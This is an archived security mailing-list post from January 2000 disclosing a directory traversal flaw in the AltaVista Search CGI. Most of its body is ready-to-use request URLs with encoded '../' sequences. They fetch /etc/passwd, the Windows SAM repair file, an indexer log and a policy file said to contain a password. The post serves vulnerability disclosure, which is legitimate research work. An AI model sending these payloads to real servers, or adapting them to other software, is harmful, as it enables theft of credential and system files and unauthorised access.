|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Altavista followup
Subject: Altavista followup
From: rudi carell (rudicarell
HOTMAIL.COM)
Date: Sun Jan 09 2000 - 09:37:04 CST
- Next message: Andrew Pimlott: "Re: Hotmail security hole - injecting JavaScript using <IMG"
- Previous message: Theodor Ragnar Gislason: "Re: [Hackerslab bug_paper] Solaris chkperm buffer overflow"
- Next in thread: Roelandts, Guy: "Re: Altavista followup"
- Reply: Roelandts, Guy: "Re: Altavista followup"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
hola,
more bugs in the AV-Search thing ..
using uri-encoded strings it is possible to view "any" file on the system ..
examples:
unixxxsss ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
or on an micro$oft IIS ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays :-/
RC
rudicarellhotmail.com
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
- Next message: Andrew Pimlott: "Re: Hotmail security hole - injecting JavaScript using <IMG"
- Previous message: Theodor Ragnar Gislason: "Re: [Hackerslab bug_paper] Solaris chkperm buffer overflow"
- Next in thread: Roelandts, Guy: "Re: Altavista followup"
- Reply: Roelandts, Guy: "Re: Altavista followup"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b27 : Mon Jan 10 2000 - 23:19:33 CST